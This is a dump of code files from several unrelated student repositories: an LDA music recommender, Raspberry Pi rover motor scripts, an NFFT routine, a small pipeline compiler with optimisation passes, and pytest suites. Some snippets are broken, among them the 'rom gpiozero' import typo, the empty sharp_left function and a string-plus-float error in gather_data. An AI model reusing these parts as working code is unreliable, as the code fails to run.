song to be generated, which is easily findable by P(t|u)P(s|t). It is unclear to me what the relationship between recommendation feature #1 and #2 is... should be somewhat similar. Note that we could be more efficient by sampling for example, rather than iterating and picking the best song (sampling like just going and DOING lda's generative story) for cosine similarity, we simply find the cluster distribution for our node by running inference on our node's "document" (it's neighbors). Then, we find the cluster distribution of an arbitrary other node (which is in the other bipartite set) by running inference on a document consisting only of that node itself. Finally we take the cosine similarity. Note that the inference on a single-word document SHOULD be equivalent to iterating through the cluster node distributions and taking that node's probability from each -- not sure which is faster. ''' partition_index = self._find_partition_index(node) # check to see that the lda model has been trained self._check_lda_model(partition_index) # get distribution for our node normalized_gamma = self._find_forwards_node_cluster_distribution(node, partition_index) # bag_rep = self._node_to_bagofneighbors(node) # gensim_bow = self.dicts[partition_index].doc2bow(bag_rep) # gamma, sstats = self.lda_models[partition_index].inference([gensim_bow]) # normalized_gamma= gamma[0]/sum(gamma[0]) scores = {} scores_cosine_sim = {} for node_to_check in self.nodes[partition_index^1]: # cosine similarity: # run inference on just the song to find the song's cluster distribution new_bag_rep = [str(node_to_check)] nnormalized_gamma = self._bag_rep_to_gamma(new_bag_rep, partition_index) # new_gensim_bow = self.dicts[partition_index].doc2bow(bag_rep) # ngamma, nsstats = self.lda_models[partition_index].inference([gensim_bow]) # nnormalized_gamma = ngamma[0]/sum(ngamma[0]) # take cosine similarity scores_cosine_sim[node_to_check] = cosine_similarity(nnormalized_gamma, normalized_gamma) #probability of generation: #score = P(s|u) = sum over t (P(t|u)P(s|t)). P(t|u) = normalized_gamma[dist_index], P(s|t) = per_cluster_node_dist[part_index][dist_index][str(node_to_check)] score = sum([self.per_cluster_node_distributions[partition_index][dist_index][str(node_to_check)]*normalized_gamma[dist_index] for dist_index in range(len(self.per_cluster_node_distributions[partition_index]))]) scores[node_to_check] = score return scores, scores_cosine_sim def _find_backwards_node_cluster_distribution(self, node, partition_index): return [distribution[str(node)] for distribution in self.per_cluster_node_distributions[partition_index]] def _find_backwards_similarity(self,node, other_node, partition_index): ''' function: _find_backwards_similarity params: node - node we are recommending for other_node - node we want to find similarity to partition_index - which partition both nodes are in returns: cosine similarity between the two nodes (they are in the same partition) notes: backwards similarity uses LDA that treats songs as generating users; each user has a distribution over topics that it is in, and backwards similarity is the cosine similarity of that topic distribution vector. Cosine similarity means that users who are similar but don't "like" as many songs are still considered similar ''' # other partition index because we're doing backwards LDA partition_index = partition_index^1 # check to see that the lda model has been trained self._check_lda_model(partition_index) #get the cluster distribution of our node node_cluster_distribution = self._find_backwards_node_cluster_distribution(node, partition_index) #get the cluster distribution of the other node other_node_cluster_distribution = self._find_backwards_node_cluster_distribution(other_node, partition_index) #return cosine similarity return cosine_similarity(node_cluster_distribution, other_node_cluster_distribution) def _bag_rep_to_gamma(self, bag_rep, partition_index): gensim_bow = self.dicts[partition_index].doc2bow(bag_rep) gamma, sstats = self.lda_models[partition_index].inference([gensim_bow]) normalized_gamma= gamma[0]/sum(gamma[0]) return normalized_gamma def _find_forwards_node_cluster_distribution(self, node, partition_index): bag_rep = self._node_to_bagofneighbors(node) return self._bag_rep_to_gamma(bag_rep, partition_index) # gensim_bow = self.dicts[partition_index].doc2bow(bag_rep) # gamma, sstats = self.lda_models[partition_index].inference([gensim_bow]) # normalized_gamma= gamma[0]/sum(gamma[0]) # return normalized_gamma def _find_forwards_similarity(self,node, other_node, partition_index): ''' function: _find_forwards_similarity params: node - node we are recommending for other_node - node we want to find similarity to partition_index - which partition both nodes are in returns: cosine similarity between the two nodes (they are in the same partition) notes: forwards similarity models users generating songs. Each user has a per-user cluster distribution. we take cosine similarity of these distributions. ''' #check to see that lda model has been trained self._check_lda_model(partition_index) #get the cluster distribution of our node node_cluster_distribution = self._find_forwards_node_cluster_distribution(node, partition_index) #get the cluster distribution of the other node other_node_cluster_distribution = self._find_forwards_node_cluster_distribution(other_node, partition_index) #return cosine similarity return cosine_similarity(node_cluster_distribution, other_node_cluster_distribution) def find_most_similar_user(self,node): partition_index = self._find_partition_index(node) backwards_sim = {} forwards_sim = {} # iterate through other nodes on node's side of the bipartite graph for other_node in self.nodes[partition_index]: backwards_similarity = self._find_backwards_similarity(node, other_node, partition_index) forwards_similarity = self._find_forwards_similarity(node, other_node, partition_index) # dicts for testing purposes, to see relationships backwards_sim[other_node] = backwards_similarity forwards_sim[other_node] = forwards_similarity return backwards_sim, forwards_sim def initialize_feature_mappings(self, node): partition_index = self._find_partition_index(node) backwards_psu, nodes_sorted = self.backwards_LDA_psu(node) forwards_psu, forwards_cosine_sim = self.forwards_LDA_psu(node) backwards_sim, forwards_sim = self.find_most_similar_user(node) self.mappings += [backwards_psu, forwards_psu, forwards_cosine_sim] self.nodes_sorted = nodes_sorted # self.mappings['backwards_psu'] = backwards_psu # self.mappings['fowards_psu'] = forwards_psu # self.mappings['forwards_cosine_sim'] = forwards_cosine_sim return partition_index def gather_data(self, dump_file_path, partition_index): ''' function: gather_data params: dump_file_path - path to dump the outputted json file into partition_index - partition to loop through returns: the data that is json'd at the end notes: usage is to loop through all the nodes and ask the user for a rating of it. on ending the loop, the data is json'd into dump_file_path ''' ratings = [] try: # loop through nodes for node in self.nodes_sorted: # for node in self.nodes[partition_index]: print "Here's the next data element:" self.print_node(node) print "\n\n" features = self.feature_factory(node) # get rating rating = raw_input("Rating? (must be an int) ---> ") sure = raw_input("Are you sure? (y/n) ---> ") while (sure != "y"): rating = raw_input("Rating? ---> ") sure = raw_input("Are you sure? (y/n) ---> ") ratings.append(features + [int(rating)]) except KeyboardInterrupt: print "Shutting down. Do not press anything." # dump json json.dump(ratings, open(dump_file_path + str(time.time() + '.json'), 'w')) return ratings return ratings # ======= [ UTILS ] ========= # def cosine_similarity(u, v): return np.dot(u,v) / (np.sqrt(np.dot(u,u)) * np.sqrt(np.dot(v,v))) ``` #### File: OpenSource/pd_to_lda/utils.py ```python from functools import partial from pd_lda import pd_lda import pandas as pd df = pd.read_pickle('calendar_events_old.df') df_one = df[:len(df)-20] df_two = df[len(df)-20:len(df)] pdlda = pd_lda() model = pdlda.update_lda(df_one, ['name']) print model.show_topic(1) # mymodel = model.copy() new_model = pdlda.update_lda(df_two, ['name']) print new_model.show_topic(1) new_df = pdlda.add_lda_column(df, ['name'], new_model) class mytest(object): def __init__(self): self.x = 33 def realtest(self, index): return index + self.x def tester(self): x = map(self.realtest, range(10)) print x def func1(self, y, z): print "first: " + str(y) print "second: " + str(z) def test(self): new = partial(self.func1, 2) new(3) ```
{ "source": "2062GlossyLedge/Rover-projects", "score": 3 }
#### File: Rover-projects/autonomous rover #1/HC-SR04+servo.py ```python from gpiozero import AngularServo from gpiozero import DistanceSensor from time import sleep s = AngularServo(18, min_angle=-90, max_angle=90) #Ultrasonic sensor reads distance for the whole program sensor = DistanceSensor(echo=27, trigger=17) s.mid() obstacle = 10 object_distance = sensor.distance * 100 print(object_distance) #move forward from rest def when_object_in_front(): while True: if object_distance <= obstacle: s.max() sleep(4) #reverse, turn left, move forward continue #a1 will only look for obstacles by turning left #if object_distance <= obstacle: #s.min() #sleep(4) #reverse #continue elif object_distance > obstacle: #Drive forward continue when_object_in_front() ``` #### File: Rover-projects/autonomous rover #2/a2_rover4.py ```python import RPi.GPIO as GPIO from time import sleep x = 100 #en changes speed of motor enA = 25 enB = 16 enC = 26 enD = 22 #bottom right motor - motor1 in1 = 24 in2 = 23 #top right motor - motor 2 in3 = 20 in4 = 21 #top left motor - motor 3 in1_2 = 19 in2_2 = 13 #bottom left motor - motor 4 in3_2 = 17 in4_2 = 27 GPIO.setmode(GPIO.BCM) #motor 1 GPIO.setup(in1,GPIO.OUT) GPIO.setup(in2,GPIO.OUT) GPIO.setup(enA,GPIO.OUT) p1 = GPIO.PWM(enA,1000) p1.start(25) #motor 2 GPIO.setup(in3,GPIO.OUT) GPIO.setup(in4,GPIO.OUT) GPIO.setup(enB,GPIO.OUT) p2 = GPIO.PWM(enB,1000) p2.start(25) #motor 3 GPIO.setup(in1_2,GPIO.OUT) GPIO.setup(in2_2,GPIO.OUT) GPIO.setup(enC,GPIO.OUT) p3 = GPIO.PWM(enC,1000) p3.start(25) #motor 4 GPIO.setup(in3_2,GPIO.OUT) GPIO.setup(in4_2,GPIO.OUT) GPIO.setup(enD,GPIO.OUT) p4 = GPIO.PWM(enD,1000) p4.start(25) def forward(): print("going forwards") p1.ChangeDutyCycle(x) p2.ChangeDutyCycle(x) p3.ChangeDutyCycle(x) p4.ChangeDutyCycle(x) GPIO.output(in3,GPIO.HIGH) GPIO.output(in4,GPIO.LOW) GPIO.output(in1,GPIO.HIGH) GPIO.output(in2,GPIO.LOW) GPIO.output(in1_2,GPIO.LOW) GPIO.output(in2_2,GPIO.HIGH) GPIO.output(in3_2,GPIO.LOW) GPIO.output(in4_2,GPIO.HIGH) def backward(): print("going backwards") GPIO.output(in3,GPIO.LOW) GPIO.output(in4,GPIO.HIGH) GPIO.output(in1,GPIO.LOW) GPIO.output(in2,GPIO.HIGH) GPIO.output(in1_2,GPIO.HIGH) GPIO.output(in2_2,GPIO.LOW) GPIO.output(in3_2,GPIO.HIGH) GPIO.output(in4_2,GPIO.LOW) def stop(): print("stopping") GPIO.output(in3,GPIO.LOW) GPIO.output(in4,GPIO.LOW) GPIO.output(in1,GPIO.LOW) GPIO.output(in2,GPIO.LOW) GPIO.output(in1_2,GPIO.LOW) GPIO.output(in2_2,GPIO.LOW) GPIO.output(in3_2,GPIO.LOW) GPIO.output(in4_2,GPIO.LOW) def turn_left(): print("turning left") GPIO.output(in3,GPIO.HIGH) GPIO.output(in4,GPIO.LOW) GPIO.output(in1,GPIO.HIGH) GPIO.output(in2,GPIO.LOW) GPIO.output(in1_2,GPIO.LOW) GPIO.output(in2_2,GPIO.LOW) GPIO.output(in3_2,GPIO.LOW) GPIO.output(in4_2,GPIO.LOW) def turn_right(): print("turning right") GPIO.output(in3,GPIO.LOW) GPIO.output(in4,GPIO.LOW) GPIO.output(in1,GPIO.LOW) GPIO.output(in2,GPIO.LOW) GPIO.output(in1_2,GPIO.LOW) GPIO.output(in2_2,GPIO.HIGH) GPIO.output(in3_2,GPIO.LOW) GPIO.output(in4_2,GPIO.HIGH) def sharp_left(): #left wheels forwards while right wheels backwards ---???? while(1): command = input("Enter 's' to start the rover: ") if command == 's': forward() sleep(3) backward() sleep(3) stop() sleep(3) turn_left() sleep(10) turn_right() sleep(10) stop() else: print("You entered the wrong command. Try again") ``` #### File: Rover-projects/autonomous rover #3/a3_rover2.py ```python rom gpiozero import LineSensor import RPi.GPIO as GPIO from time import sleep x = 75 x1 = 0 x2 = 100 sensor1 = LineSensor(26) sensor2 = LineSensor(16) enA = 25 enB = 12 in1 = 24 in2 = 23 in3 = 20 in4 = 21 GPIO.setmode(GPIO.BCM) #motor 1 GPIO.setup(in1,GPIO.OUT) GPIO.setup(in2,GPIO.OUT) GPIO.setup(enA,GPIO.OUT) p1 = GPIO.PWM(enA,1000) p1.start(25) #motor 2 GPIO.setup(in3,GPIO.OUT) GPIO.setup(in4,GPIO.OUT) GPIO.setup(enB,GPIO.OUT) p2 = GPIO.PWM(enB,1000) p2.start(25) def forward(): print("going forwards") p1.ChangeDutyCycle(x) p2.ChangeDutyCycle(x) GPIO.output(in3,GPIO.LOW) GPIO.output(in4,GPIO.HIGH) GPIO.output(in1,GPIO.LOW) GPIO.output(in2,GPIO.HIGH) def turn_left(): print("turning left") p1.ChangeDutyCycle(x1) p2.ChangeDutyCycle(x2) GPIO.output(in3,GPIO.LOW) GPIO.output(in4,GPIO.HIGH) GPIO.output(in1,GPIO.LOW) GPIO.output(in2,GPIO.LOW) def turn_right(): print("turning right") p1.ChangeDutyCycle(x2) p2.ChangeDutyCycle(x1) GPIO.output(in3,GPIO.LOW) GPIO.output(in4,GPIO.LOW) GPIO.output(in1,GPIO.LOW) GPIO.output(in2,GPIO.HIGH) def stop(): print("stopping") GPIO.output(in3,GPIO.LOW) GPIO.output(in4,GPIO.LOW) GPIO.output(in1,GPIO.LOW) GPIO.output(in2,GPIO.LOW) def stay_on_line(): print("staying on line") forward() def straighten(): print("straightening") stop() sleep(1) turn_left() sleep(1) stop() sleep(1) turn_right() sleep(1) stop() sleep(1) sensor1.when_line = stay_on_line sensor1.when_no_line = straighten sensor2.when_line = stay_on_line sensor2.when_no_line = straighten ```
{ "source": "2065983Y/spinner", "score": 3 }
#### File: 2065983Y/spinner/Block.py ```python class Block(object): def __init__(self, name, type, x, y): self.name = name self.type = type ```
{ "source": "207leftovers/cs207project", "score": 3 }
#### File: cs207project/procs/_nfft.py ```python import numpy as np from numpy.fft import * def _spread(y, yy, n, x, m): """ Given an array yy, extirpolate a value y into m actual array elements that best approximate the array element number x. Need to call for every value in an array(In place operations) Input - y - Input value yy - Actual array to which value is to be extirpolated n - Maximum frequency x - Element number being approximated m - Number of points to be interpolated for 1/4th cycle. """ nfac=[0,1,1,2,6,24,120,720,5040,40320,362880] if m > 10. : print('factorial table too small in spread') return ix=int(x) if x == float(ix): yy[ix]=yy[ix]+y else: ilo = int(x-0.5*float(m)+1.0) ilo = min( max( ilo , 1 ), n-m+1 ) ihi = ilo+m-1 nden = nfac[m] fac=x-ilo for j in range(ilo+1,ihi+1): fac = fac*(x-j) yy[ihi] = yy[ihi] + y*fac/(nden*(x-ihi)) for j in range(ihi-1,ilo-1,-1): nden=(nden/(j+1-ilo))*(j-ihi) yy[j] = yy[j] + y*fac/(nden*(x-j)) def _nfft(mag, time,ofac,hifac, MACC=4): """ Input- mag - List of magnitudes time - List of time values corresponding to the magnitude ofac - Oversampling factor hifac - Highest frequency for which periodogram is to be constructed. Output- Wk1 : An array of frequencies. Wk2 : An array of corresponding values of the periodogram. nout : Wk1 & Wk2 dimensions (number of calculated frequencies) """ n = len(time) #Arrays are to be of length if its possible to get the FFT assert n == len(mag) nout = 0.5*ofac*hifac*n nfreqt = ofac*hifac*n*MACC #Size the FFT as next power nfreq = 64 # of 2 above nfreqt. while nfreq < nfreqt: nfreq = 2*nfreq ndim = 2*nfreq #Compute the mean, variance mean = np.mean(mag) ##sample variance because the divisor is N-1 var = ((mag-mean)**2).sum()/(len(mag)-1) # and range of the data. xmin = time.min() xmax = time.max() xdif = xmax-xmin fac = ndim/(xdif*ofac) fndim = ndim ck = ((time-xmin)*fac) % fndim ckk = (2.0*ck) % fndim #extirpolate the data wk1 = np.zeros(ndim, dtype='complex') wk2 = np.zeros(ndim, dtype='complex') #calling spread in order to compute FFT later for j in range(0, n): _spread(mag[j]-mean,wk1,ndim,ck[j],MACC) _spread(1.0,wk2,ndim,ckk[j],MACC) #Take the Fast Fourier Transforms wk1 = ifft( wk1 )*len(wk1) wk2 = ifft( wk2 )*len(wk1) wk1 = wk1[1:nout+1] wk2 = wk2[1:nout+1] real_wk1 = wk1.real imag_wk1 = wk1.imag real_wk2 = wk2.real imag_wk2 = wk2.imag #Diff factor df = 1.0/(xdif*ofac) #Compute the Lomb value for each frequency hypo = 2.0 * abs(wk2) #hc2wt - Represents half cos(2*w*t) term #hs2wt - Represents half sin(2*w*t) term hc2wt = real_wk2/hypo hs2wt = imag_wk2/hypo #cwt - Represents cos(w*t) term #swt - Represents sin(w*t) term cwt = np.sqrt(0.5+hc2wt) swt = np.sign(hs2wt)*(np.sqrt(0.5-hc2wt)) #den - calculating denominator in order to compute the sin and cos term den = 0.5*n+hc2wt*real_wk2+hs2wt*imag_wk2 #cterm - cos term coefficients #sterm - sin term coefficients cterm = (cwt*real_wk1+swt*imag_wk1)**2./den sterm = (cwt*imag_wk1-swt*real_wk1)**2./(n-den) #Computing the final periodogram values and building the scale of frequencies wk1 = df*(np.arange(nout, dtype='float')+1.) wk2 = (cterm+sterm)/(2.0*var) return wk1, wk2, nout ``` #### File: cs207project/pype/optimize.py ```python from .fgir import * from .error import * # Optimization pass interfaces class Optimization(object): def visit(self, obj): pass class FlowgraphOptimization(Optimization): '''Called on each flowgraph in a FGIR. May modify the flowgraph by adding or removing nodes (return a new Flowgraph). If you modify nodes, make sure inputs, outputs, and variables are all updated. May NOT add or remove flowgraphs.''' pass class TopologicalFlowgraphOptimization(Optimization): '''Called on each flowgraph in a FGIR, in dependent order. Components which are used by other components will be called first.''' pass class NodeOptimization(Optimization): '''Called on each node in a FGIR. May modify the node (return a new Node object, and it will be assigned). May NOT remove or add nodes (use a component pass).''' pass class TopologicalNodeOptimization(NodeOptimization): pass # Optimization pass implementations class PrintIR(TopologicalNodeOptimization): 'A simple "optimization" pass which can be used to debug topological sorting' def visit(self, node): print(str(node)) class AssignmentEllision(FlowgraphOptimization): '''Eliminates all assignment nodes. Assignment nodes are useful for the programmer to reuse the output of an expression multiple times, and the lowering transformation generates explicit flowgraph nodes for these expressions. However, they are not necessary for execution, as they simply forward their value. This removes them and connects their pre- and post-dependencies.''' def visit(self, flowgraph): # Check all the nodes in the flowgraph and remove assigment nodes to_remove = [] # Keeps track of the predecessors to nodes to be removed to_remove_inputs = {} # Find all assignment nodes to remove for node in flowgraph.nodes.keys(): # If the node is an assigment, eliminate it if flowgraph.nodes[node].type == FGNodeType.assignment: to_remove.append(node) to_remove_inputs[node] = flowgraph.nodes[node].inputs # Update the nodes that are before and after the assignment nodes for node in flowgraph.nodes.keys(): for to_remove_node in to_remove_inputs: if to_remove_node in flowgraph.nodes[node].inputs: flowgraph.nodes[node].inputs.remove(to_remove_node) flowgraph.nodes[node].inputs.extend(to_remove_inputs[to_remove_node]) for var in flowgraph.variables: node = flowgraph.variables[var] if node in to_remove: flowgraph.variables[var] = to_remove_inputs[node][0] # Clear out the nodes that should be removed for node_to_remove in to_remove: del flowgraph.nodes[node_to_remove] return flowgraph class DeadCodeElimination(FlowgraphOptimization): '''Eliminates unreachable expression statements. Statements which never affect any output are effectively useless, and we call these "dead code" blocks. This optimization removes any expressions which can be shown not to affect the output. NOTE: input statements *cannot* safely be removed, since doing so would change the call signature of the component. For example, it might seem that the input x could be removed: { component1 (input x y) (output y) } but imagine this component1 was in a file alongside this one: { component2 (input a b) (:= c (component a b)) (output c) } By removing x from component1, it could no longer accept two arguments. So in this instance, component1 will end up unmodified after DCE.''' def visit(self, flowgraph): # Check all the nodes in the flowgraph and remove dead nodes # Start with assuming all nodes should be removed, and then # work backwards from the outputs to remove unused ones to_remove = list(flowgraph.nodes.keys()) # Need to copy this list, otherwise you are modifying the originals to_check = flowgraph.outputs[:] while len(to_check) > 0: cur = to_check.pop() to_remove.remove(cur) # Add all previous to the to_check queue for key in flowgraph.nodes[cur].inputs: if key in to_remove and key not in to_check: to_check.append(key) # Now eliminate whatever is left and hasn't been visited if len(to_remove) > 0: print("Removing nodes", to_remove) for key in to_remove: del flowgraph.nodes[key] to_remove_vars = [] # Remove unused variables as well for var in flowgraph.variables: node = flowgraph.variables[var] if node in to_remove: to_remove_vars.append(var) for var in to_remove_vars: del flowgraph.variables[var] return flowgraph class InlineComponents(TopologicalFlowgraphOptimization): '''Replaces every component invocation with a copy of that component's flowgraph. Topological order guarantees that we inline components before they are invoked.''' def __init__(self): self.component_cache = {} def visit(self, flowgraph): for (cnode_id, cnode) in [(nid,n) for (nid,n) in flowgraph.nodes.items() if n.type==FGNodeType.component]: target = self.component_cache[cnode.ref] # Add a copy of every node in target flowgraph id_map = {} # maps node id's in the target to node id's in our flowgraph for tnode in target.nodes.values(): if tnode.type==FGNodeType.input or tnode.type==FGNodeType.output: newtype = FGNodeType.forward else: newtype = tnode.type n = flowgraph.new_node(newtype, ref=tnode.ref) id_map[tnode.nodeid] = n.nodeid # Connect all copies together for tid,tnode in target.nodes.items(): flowgraph.nodes[id_map[tid]].inputs = [id_map[i] for i in tnode.inputs] # Link inputs of cnode to inputs of target flowgraph for cnode_input,targ_input in zip(cnode.inputs, target.inputs): flowgraph.nodes[id_map[targ_input]].inputs = [cnode_input] # Link output of target flowgraph to outputs of cnode for oid,onode in flowgraph.nodes.items(): if cnode_id in onode.inputs: onode.inputs[onode.inputs.index(cnode_id)] = id_map[target.outputs[0]] # Remove all other references to cnode in flowgraph del flowgraph.nodes[cnode_id] victims = [s for s,nid in flowgraph.variables.items() if nid==cnode_id] for v in victims: del flowgraph.variables[v] self.component_cache[flowgraph.name] = flowgraph return flowgraph ``` #### File: cs207project/pype/semantic_analysis.py ```python from pype.ast import * from pype.error import * class PrettyPrint(ASTVisitor): def __init__(self): pass def visit(self, node): print(node.__class__.__name__) class CheckSingleAssignment(ASTVisitor): def __init__(self): self.component_names = [] self.names_used = [] def visit(self, node): #if the visitor visits a component, check if the name is taken. if it is not, initialize #an empty list for the component and insert into dictionary if isinstance(node, ASTComponent): self.names_used = [] new_component_name = node.name.name if new_component_name in self.component_names: raise PypeSyntaxError('Component name: ' + new_component_name +' has already been taken') else: self.component_names.append(new_component_name) elif isinstance(node, ASTAssignmentExpr): name = node.binding.name if name in self.names_used: raise PypeSyntaxError('Node name: ' + name + ' has already been taken') else: self.names_used.append(name) elif isinstance(node, ASTInputExpr): for input_expression in node.children: name = input_expression.name if name in self.names_used: raise PypeSyntaxError('Node name: ' + name + ' has already been taken') else: self.names_used.append(name) class CheckSingleIOExpression(ASTVisitor): def __init__(self): self.component = None self.component_has_input = False self.component_has_output = False def visit(self, node): if isinstance(node, ASTComponent): self.component = node.name.name self.component_has_input = False self.component_has_output = False elif isinstance(node, ASTInputExpr): if self.component_has_input: raise PypeSyntaxError('Component '+str(self.component)+' has multiple input expressions') self.component_has_input = True elif isinstance(node, ASTOutputExpr): if self.component_has_output: raise PypeSyntaxError('Component '+str(self.component)+' has multiple output expressions') self.component_has_output = True class CheckUndefinedVariables(ASTVisitor): def __init__(self, symtab): self.symtab = symtab self.scope=None def visit(self, node): if isinstance(node, ASTComponent): self.scope = node.name.name elif isinstance(node, ASTID): print(node.name) if self.symtab.lookupsym(node.name, scope=self.scope) is None: raise PypeSyntaxError('Undefined variable: ' + str(node.name)) ``` #### File: tests/procs/test_corr.py ```python import numpy as np np.random.seed(0) from procs import _corr from timeseries import TimeSeries def test_tsmaker(): #Setting seed to equate the two timeseries _,t1 = _corr.tsmaker(0.5, 0.1, 0.01) assert(len(t1.values()) == 100) def test_randomts(): t1 = _corr.random_ts(0.5) assert(len(t1.values()) == 100) def test_stand(): t1 = TimeSeries([1, 2, 3, 4], [40, 50, 60, 70]) val = _corr.stand(np.array(t1.values()), 55.0, 10) assert(list(val) == [-1.5, -0.5, 0.5, 1.5]) def test_ccor(): #Testing the corr function independently t1 = TimeSeries([1, 2, 3, 4], [40, 50, 60, 70]) t2 = TimeSeries([1, 2, 3, 4], [40, 50, 60, 70]) val = _corr.ccor(t1, t2) assert(list(np.real(val)) == [12600, 12000, 11800, 12000]) assert(list(np.imag(val)) == [0, 0, 0, 0]) def test_maxcorr(): t1 = TimeSeries([1, 2, 3, 4], [40, 50, 60, 70]) t2 = TimeSeries([1, 2, 3, 4], [50, 60, 70, 40]) standts1 = _corr.stand(t1, t1.mean(), t1.std()) standts2 = _corr.stand(t2, t2.mean(), t2.std()) idx, mcorr = _corr.max_corr_at_phase(standts1, standts2) #idx should be equal to one since the second ts is shifted by 1 assert(idx == 1) assert(np.real(mcorr) == 4) def test_kernelcorr(): t1 = TimeSeries([1, 2, 3, 4], [40, 50, 60, 70]) t2 = TimeSeries([1, 2, 3, 4], [40, 50, 60, 70]) standts1 = _corr.stand(t1, t1.mean(), t1.std()) standts2 = _corr.stand(t2, t2.mean(), t2.std()) #Kernel_corr should return a correlation of 1.0 since we use similar timeseries assert(_corr.kernel_corr(standts1, standts2, mult=1) == 1.0) ``` #### File: tests/pype/test_fgir.py ```python from pype import fgir from pype.translate import SymbolTableVisitor, LoweringVisitor from pype.optimize import * from pype import lexer from pype import parser from pype import ast from pype.semantic_analysis import CheckSingleAssignment, CheckSingleIOExpression, PrettyPrint, CheckUndefinedVariables from timeseries import TimeSeries input = """(import timeseries) { standardize (input (TimeSeries t)) (:= mu (mean t)) (:= sig (std t)) (:= new_t (/ (- t mu) sig)) (output new_t) }""" ast = parser.parse(input, lexer=lexer) syms = ast.walk( SymbolTableVisitor() ) ir = ast.mod_walk( LoweringVisitor(syms) ) standardize_graph = ir.graphs['standardize'] def test_nodes(): assert(standardize_graph.nodes['@N0'].nodeid == '@N0') assert(standardize_graph.nodes['@N0'].inputs == []) assert(standardize_graph.nodes['@N0'].ref == None) assert(standardize_graph.nodes['@N0'].__repr__() == '<FGNodeType.input @N0<= : None>') assert(standardize_graph.nodes['@N1'].nodeid == '@N1') assert(standardize_graph.nodes['@N1'].inputs == ['@N0']) assert(standardize_graph.nodes['@N1'].ref == TimeSeries.mean) assert(standardize_graph.nodes['@N2'].nodeid == '@N2') assert(standardize_graph.nodes['@N2'].inputs == ['@N1']) assert(standardize_graph.nodes['@N2'].ref == None) assert(standardize_graph.nodes['@N3'].nodeid == '@N3') assert(standardize_graph.nodes['@N3'].inputs == ['@N0']) assert(standardize_graph.nodes['@N3'].ref == TimeSeries.std) assert(standardize_graph.nodes['@N4'].nodeid == '@N4') assert(standardize_graph.nodes['@N4'].inputs == ['@N3']) assert(standardize_graph.nodes['@N4'].ref == None) assert(standardize_graph.nodes['@N5'].nodeid == '@N5') assert(standardize_graph.nodes['@N5'].inputs == ['@N0', '@N2']) assert(standardize_graph.nodes['@N5'].ref == TimeSeries.__sub__) def test_topological_sort(): dotfile = standardize_graph.dotfile() sorted_nodes = standardize_graph.topological_sort() # Ensure that the dotfile print out hasn't been affected by topological sort assert(dotfile == standardize_graph.dotfile()) # Check input is first assert(sorted_nodes[0] == '@N0') # Check output is last assert(sorted_nodes[-1] == '@N8') # Check some orderings assert(sorted_nodes.index('@N5') > sorted_nodes.index('@N0')) assert(sorted_nodes.index('@N5') > sorted_nodes.index('@N2')) assert(sorted_nodes.index('@N4') > sorted_nodes.index('@N3')) assert(sorted_nodes.index('@N2') > sorted_nodes.index('@N1')) assert(sorted_nodes.index('@N1') > sorted_nodes.index('@N0')) ``` #### File: tests/pype/test_pcode.py ```python import sys import os from pype.pipeline import * from timeseries.TimeSeries import TimeSeries from pype.pcode import PCodeGenerator sys.path.append('/samples/') input1 = """(import timeseries) { standardize (input (TimeSeries t)) (:= mu (mean t)) (:= sig (std t)) (:= new_t (/ (- t mu) sig)) (output new_t) }""" def test_pcode_l(): time = [] values = [] for x in range(100): time.append(x) values.append(x-50) a = TimeSeries(time, values) ast = parser.parse(input1, lexer=lexer) # Semantic analysis ast.walk( CheckSingleAssignment() ) ast.walk( CheckSingleIOExpression() ) syms = ast.walk( SymbolTableVisitor() ) ast.walk( CheckUndefinedVariables(syms) ) # Translation ir = ast.mod_walk( LoweringVisitor(syms) ) ir.flowgraph_pass( AssignmentEllision() ) ir.flowgraph_pass( DeadCodeElimination() ) ir.topological_flowgraph_pass( InlineComponents() ) # PCode Generation pcodegen = PCodeGenerator() ir.flowgraph_pass( pcodegen ) pcodes = pcodegen.pcodes standardized_TS = pcodes['standardize'].run(a) # Test the mean and standard deviation assert(round(standardized_TS.mean(), 7) == 0) assert(round(standardized_TS.std()-1, 7) == 0) def test_pcode_2(): input2 = """{aer (input b) (:= a "a") (output a) }""" ast = parser.parse(input2, lexer=lexer) # Semantic analysis ast.walk( CheckSingleAssignment() ) ast.walk( CheckSingleIOExpression() ) syms = ast.walk( SymbolTableVisitor() ) ast.walk( CheckUndefinedVariables(syms) ) # Translation ir = ast.mod_walk( LoweringVisitor(syms) ) ir.flowgraph_pass( AssignmentEllision() ) ir.flowgraph_pass( DeadCodeElimination() ) ir.topological_flowgraph_pass( InlineComponents() ) # PCode Generation pcodegen = PCodeGenerator() ir.flowgraph_pass( pcodegen ) pcodes = pcodegen.pcodes a = pcodes['aer'].run('b') assert(a == '"a"') ``` #### File: tests/tsdb/test_tsdb_server.py ```python from tsdb import TSDBServer, DictDB, TSDBClient, TSDBProtocol import timeseries as ts from concurrent.futures import ThreadPoolExecutor, thread from tsdb.tsdb_ops import * from collections import defaultdict, OrderedDict from importlib import import_module import time import numpy as np import asynctest import procs identity = lambda x: x schema = { 'pk': {'convert': identity, 'index': None}, #will be indexed anyways 'ts': {'convert': identity, 'index': None}, 'order': {'convert': int, 'index': 1}, 'blarg': {'convert': int, 'index': 1}, 'useless': {'convert': identity, 'index': None}, 'mean': {'convert': float, 'index': 1}, 'std': {'convert': float, 'index': 1}, 'vp': {'convert': bool, 'index': 1} } NUMVPS = 5 # we augment the schema by adding columns for 5 vantage points for i in range(NUMVPS): schema["d_vp-{}".format(i)] = {'convert': float, 'index': 1} class Test_TSDB_Protocol(): def test_protocol(self): db = DictDB(schema, 'pk') server = TSDBServer(db) prot = TSDBProtocol(server) # Dumb server tests assert(server.db == db) assert(server.port == 9999) t1 = [0,1,2,3,4] v1 = [1.0,2.0,3.0,2.0,1.0] ats1 = ts.TimeSeries(t1, v1) t2 = [10,11,12,13,14] v2 = [-1.0,-2.0,-3.0,-2.0,-1.0] ats2 = ts.TimeSeries(t2, v2) # Test TSDBOp_InsertTS insert_op = {} insert_op['pk'] = 1 insert_op['ts'] = ats1 insert_op['op'] = 'insert_ts' InsertedTS = TSDBOp_InsertTS(1, ats1) assert(insert_op == InsertedTS) # Test Protocol Insert insert_return = prot._insert_ts(insert_op) assert(insert_return['op'] == 'insert_ts') assert(insert_return['status'] == TSDBStatus.OK) assert(insert_return['payload'] == None) inserted_row = server.db.rows[1] assert(inserted_row['pk'] == 1) assert(inserted_row['ts'] == ats1) # Add some more data prot._insert_ts(TSDBOp_InsertTS(2, ats1)) inserted_row = server.db.rows[2] assert(inserted_row['ts'] == ats1) # Test Protocol Upsert upserted_meta = TSDBOp_UpsertMeta(2, {'ts': ats2, 'order': 1}) upsert_return = prot._upsert_meta(upserted_meta) assert(upsert_return['op'] == 'upsert_meta') 